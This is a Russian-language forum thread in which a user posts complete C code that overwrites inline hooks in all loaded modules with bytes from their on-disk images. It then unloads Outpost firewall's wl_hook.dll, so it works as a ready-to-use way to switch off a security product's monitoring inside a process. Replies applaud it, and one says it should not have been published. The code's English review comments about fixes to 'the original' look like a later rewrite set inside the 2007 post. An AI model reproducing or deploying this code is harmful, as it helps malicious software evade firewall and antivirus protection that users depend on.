Unhook API всех модулей

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by KEZ, 7 Sep 2007.

  1. KEZ

    Нужно было выгрузить Outpost'овскую wl_hook.dll, которая перехватывает FindWindowEx, DdeConnect и т.п. функции межпроцессного взаимодействия.
    Код восстанавливает (анхукает) начало каждой экспортируемой функции всех модулей процесса по их копии на диске, после чего выгружает саму wl_hook.dll (для понту).

    Code:
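    /* Number of bytes compared and restored at the start of each export
     * (the original routine used the same fixed 10-byte window). */
    enum { PATCH_WINDOW = 10 };

    /* Return TRUE if the window [rva, rva+len) lies entirely inside one section
     * of the image described by nh AND that section is marked executable.
     * Exports that fail this test are data (or point past the image) and
     * must never be overwritten with on-disk bytes. */
    static BOOL RvaInExecutableSection( const IMAGE_NT_HEADERS *nh, DWORD rva, DWORD len ) {
        const IMAGE_SECTION_HEADER *sh = IMAGE_FIRST_SECTION( nh );
        WORD s;

        for (s = 0; s < nh->FileHeader.NumberOfSections; s++) {
            DWORD start = sh[s].VirtualAddress;
            DWORD size  = sh[s].Misc.VirtualSize ? sh[s].Misc.VirtualSize : sh[s].SizeOfRawData;

            /* overflow-safe form of: start <= rva && rva + len <= start + size */
            if (rva >= start && size >= len && rva - start <= size - len)
                return (sh[s].Characteristics & IMAGE_SCN_MEM_EXECUTE) != 0;
        }
        return FALSE;
    }

    /* Apply the image's base relocations that fall inside [rva, rva+len) to
     * buf, which holds the unrelocated bytes of that window as read from the
     * mapped file.  delta is (actual load address - ImageBase recorded in the
     * mapped header).  The SEC_IMAGE view lays sections out as in memory but
     * does not relocate them for this view, so without this step any prologue
     * containing an absolute address would look "hooked" in a relocated
     * module and be clobbered with a stale address.
     * Returns FALSE when a relocation straddles the window edge or has a type
     * this code does not understand: the window cannot be reconstructed and
     * the caller must leave that export alone. */
    static BOOL RelocateWindow( const BYTE *img, const IMAGE_OPTIONAL_HEADER *oh,
                                DWORD rva, DWORD len, BYTE *buf, LONG_PTR delta ) {
        const IMAGE_DATA_DIRECTORY *dir = &oh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
        DWORD off = 0;

        if (delta == 0 || dir->VirtualAddress == 0 || dir->Size == 0)
            return TRUE;                                   /* nothing to fix up */
        if (dir->VirtualAddress > oh->SizeOfImage || dir->Size > oh->SizeOfImage - dir->VirtualAddress)
            return FALSE;                                  /* malformed directory */

        while (off + sizeof(IMAGE_BASE_RELOCATION) <= dir->Size) {
            const IMAGE_BASE_RELOCATION *blk = (const IMAGE_BASE_RELOCATION *)(img + dir->VirtualAddress + off);
            const WORD *entries = (const WORD *)(blk + 1);
            DWORD count, e;

            if (blk->SizeOfBlock < sizeof(IMAGE_BASE_RELOCATION) || blk->SizeOfBlock > dir->Size - off)
                return FALSE;                              /* corrupt block; also prevents a zero-size loop */
            count = (blk->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);

            for (e = 0; e < count; e++) {
                WORD  type   = (WORD)(entries[e] >> 12);
                DWORD target = blk->VirtualAddress + (entries[e] & 0xFFF);
                DWORD width  = 0, span;

                if (type == IMAGE_REL_BASED_ABSOLUTE) continue;   /* padding entry */
                if (type == IMAGE_REL_BASED_HIGHLOW)  width = 4;
                if (type == IMAGE_REL_BASED_DIR64)    width = 8;
                span = width ? width : 8;                  /* unknown type: assume the widest */

                if (target + span <= rva || target >= rva + len)
                    continue;                              /* does not touch the window */
                if (width == 0 || target < rva || target + width > rva + len)
                    return FALSE;                          /* unsupported or partial overlap */

                if (width == 4) {
                    DWORD v;
                    memcpy( &v, buf + (target - rva), sizeof v );
                    v += (DWORD)delta;
                    memcpy( buf + (target - rva), &v, sizeof v );
                } else {
                    ULONGLONG v;
                    memcpy( &v, buf + (target - rva), sizeof v );
                    v += (ULONGLONG)(LONGLONG)delta;
                    memcpy( buf + (target - rva), &v, sizeof v );
                }
            }
            off += blk->SizeOfBlock;
        }
        return TRUE;
    }

    /* Walk the export table of the mapped on-disk image hMap and rewrite the
     * first PATCH_WINDOW bytes of every exported function in the loaded copy
     * at hMod whenever they differ from the (relocation-adjusted) file bytes.
     * Skipped: empty ordinal slots, forwarded exports (the RVA points at a
     * name string inside the export directory), exports outside executable
     * sections, and windows whose relocations cannot be reconstructed. */
    static VOID RestoreExports( HMODULE hMod, LPVOID hMap ) {
        const BYTE *img = (const BYTE *)hMap;
        const IMAGE_DOS_HEADER *dh = (const IMAGE_DOS_HEADER *)img;
        const IMAGE_NT_HEADERS *nh;
        const IMAGE_OPTIONAL_HEADER *oh;
        const IMAGE_DATA_DIRECTORY *expDir;
        const IMAGE_EXPORT_DIRECTORY *ed;
        const DWORD *fnRvas;
        LONG_PTR delta;
        DWORD i;

        if (dh->e_magic != IMAGE_DOS_SIGNATURE) return;
        nh = (const IMAGE_NT_HEADERS *)(img + dh->e_lfanew);
        if (nh->Signature != IMAGE_NT_SIGNATURE) return;
        oh = &nh->OptionalHeader;

        expDir = &oh->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
        if (expDir->VirtualAddress == 0 || expDir->Size == 0) return;           /* nothing exported */
        if (expDir->VirtualAddress > oh->SizeOfImage ||
            sizeof(*ed) > oh->SizeOfImage - expDir->VirtualAddress) return;
        ed = (const IMAGE_EXPORT_DIRECTORY *)(img + expDir->VirtualAddress);

        if (ed->AddressOfFunctions > oh->SizeOfImage ||
            ed->NumberOfFunctions > (oh->SizeOfImage - ed->AddressOfFunctions) / sizeof(DWORD)) return;
        fnRvas = (const DWORD *)(img + ed->AddressOfFunctions);

        /* Actual load address minus the ImageBase the mapped pages are laid
         * out for.  NOTE(review): this assumes the ImageBase in the mapped
         * header matches the base the section's pages were fixed up for (true
         * for an unrelocated file; kernel-side ASLR fixups are believed to
         * rewrite the header as well) — confirm on the target OS. */
        delta = (LONG_PTR)((ULONG_PTR)hMod - (ULONG_PTR)oh->ImageBase);

        for (i = 0; i < ed->NumberOfFunctions; i++) {
            DWORD  rva = fnRvas[i];
            BYTE   diskBytes[PATCH_WINDOW], liveBytes[PATCH_WINDOW];
            LPVOID live;
            SIZE_T done;

            if (rva == 0) continue;                                              /* unused ordinal slot */
            if (rva >= expDir->VirtualAddress && rva - expDir->VirtualAddress < expDir->Size)
                continue;                                                        /* forwarder, not code */
            if (!RvaInExecutableSection( nh, rva, PATCH_WINDOW )) continue;      /* data export / past image */

            memcpy( diskBytes, img + rva, PATCH_WINDOW );
            if (!RelocateWindow( img, oh, rva, PATCH_WINDOW, diskBytes, delta )) continue;

            live = (LPVOID)((ULONG_PTR)hMod + rva);
            if (!ReadProcessMemory( GetCurrentProcess(), live, liveBytes, PATCH_WINDOW, &done ) ||
                done != PATCH_WINDOW)
                continue;                                                        /* unreadable: leave it */
            if (memcmp( liveBytes, diskBytes, PATCH_WINDOW ) == 0) continue;    /* not hooked */

            /* WriteProcessMemory handles the page protection change itself;
             * flush the i-cache afterwards so the restored prologue executes. */
            if (WriteProcessMemory( GetCurrentProcess(), live, diskBytes, PATCH_WINDOW, &done ))
                FlushInstructionCache( GetCurrentProcess(), live, PATCH_WINDOW );
        }
    }

    /*
     * Restore the prologue of every exported function of the module lpModName
     * (already loaded in this process) from its on-disk image, undoing inline
     * hooks placed on them.
     *
     * lpModName: module name as reported by the loader (e.g. "user32.dll").
     * No return value; any failure (module not loaded, file unreadable,
     * mapping failed, malformed headers) silently leaves the module as is.
     *
     * Differences from the naive approach:
     *  - the file compared is the one the module was actually loaded from
     *    (GetModuleFileName), not "<system dir>\<name>", so a same-named DLL
     *    loaded from another directory is never used as a template;
     *  - writes go to the module's actual base (GetModuleHandle), not the
     *    preferred ImageBase from the file, so a relocated module does not
     *    cause blind writes into unrelated memory;
     *  - every handle is released only if it was obtained (the original
     *    unmapped/closed uninitialized values on the failure paths, and
     *    tested CreateFileMapping against INVALID_HANDLE_VALUE although it
     *    reports failure with NULL).
     *
     * Caveats: code is patched while other threads may be executing it (no
     * thread suspension); if the file on disk was replaced after the module
     * was loaded, every export will mismatch and be rewritten with the new
     * file's bytes.  Same-process WriteProcessMemory onto code pages is a
     * pattern defensive tooling commonly flags.
     */
    VOID UnhookMod( LPSTR lpModName ) {
        HMODULE hMod;
        CHAR    szPath[MAX_PATH];
        DWORD   n;
        HANDLE  hFile, hMapping = NULL;
        LPVOID  hMap = NULL;

        hMod = GetModuleHandleA( lpModName );
        if (hMod == NULL) return;                              /* not loaded here: nothing to restore */

        /* returns nSize (and may leave no terminator) when truncated */
        n = GetModuleFileNameA( hMod, szPath, MAX_PATH );
        if (n == 0 || n >= MAX_PATH) return;

        hFile = CreateFileA( szPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL );
        if (hFile == INVALID_HANDLE_VALUE) return;

        /* SEC_IMAGE maps the file laid out as an image so export RVAs can be
         * used directly against the view base. */
        hMapping = CreateFileMappingA( hFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL );
        if (hMapping != NULL) {
            hMap = MapViewOfFile( hMapping, FILE_MAP_READ, 0, 0, 0 );
            if (hMap != NULL)
                RestoreExports( hMod, hMap );
        }

        /* release in reverse order of acquisition */
        if (hMap != NULL)     UnmapViewOfFile( hMap );
        if (hMapping != NULL) CloseHandle( hMapping );
        CloseHandle( hFile );
    }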
    
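    /*
     * Restore the exported prologues of every module loaded in this process,
     * skipping wl_hook.dll itself, then drop one reference to wl_hook.dll.
     *
     * Fixes relative to the original: MODULEENTRY32.dwSize is set before
     * Module32First (the call fails without it, so the loop never ran); the
     * snapshot is retried on the transient ERROR_BAD_LENGTH the module
     * snapshot can return; the snapshot handle is closed only when valid;
     * the hook-DLL name comparison is case-insensitive.
     *
     * Caveat: FreeLibrary only decrements the load count, so whether the DLL
     * actually leaves the process depends on how many references the
     * component that injected it holds.
     */
    VOID UnloadWLHook( VOID ) {
        MODULEENTRY32 me;
        HANDLE  hSnapshot = INVALID_HANDLE_VALUE;
        HMODULE hHook;
        int     attempt;

        /* TH32CS_SNAPMODULE may fail with ERROR_BAD_LENGTH while the module
         * list is changing; the documented remedy is to retry. */
        for (attempt = 0; attempt < 3; attempt++) {
            hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPMODULE, GetCurrentProcessId() );
            if (hSnapshot != INVALID_HANDLE_VALUE || GetLastError() != ERROR_BAD_LENGTH)
                break;
        }

        if (hSnapshot != INVALID_HANDLE_VALUE) {
            ZeroMemory( &me, sizeof me );
            me.dwSize = sizeof me;                         /* required, else Module32First fails */

            if (Module32First( hSnapshot, &me )) {
                do {
                    /* leave the hook DLL itself alone; it is about to be freed */
                    if (lstrcmpiA( me.szModule, "wl_hook.dll" ) != 0)
                        UnhookMod( me.szModule );
                } while (Module32Next( hSnapshot, &me ));
            }
            CloseHandle( hSnapshot );
        }

        hHook = GetModuleHandleA( "wl_hook.dll" );
        if (hHook != NULL)
            FreeLibrary( hHook );
    }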
    
    ставьте плюсики я герой!!!!!!!!!!!
     
  2. GlOFF

    Прикольно, KEZ, оказывается вся фича в механизме экспорта wl_hook.dll :)))

    Получи.... :)))
     
  3. z01b

    +100000
    P.S. Не надо было в паблик выкладывать )
     
    #3 z01b, 17 Sep 2007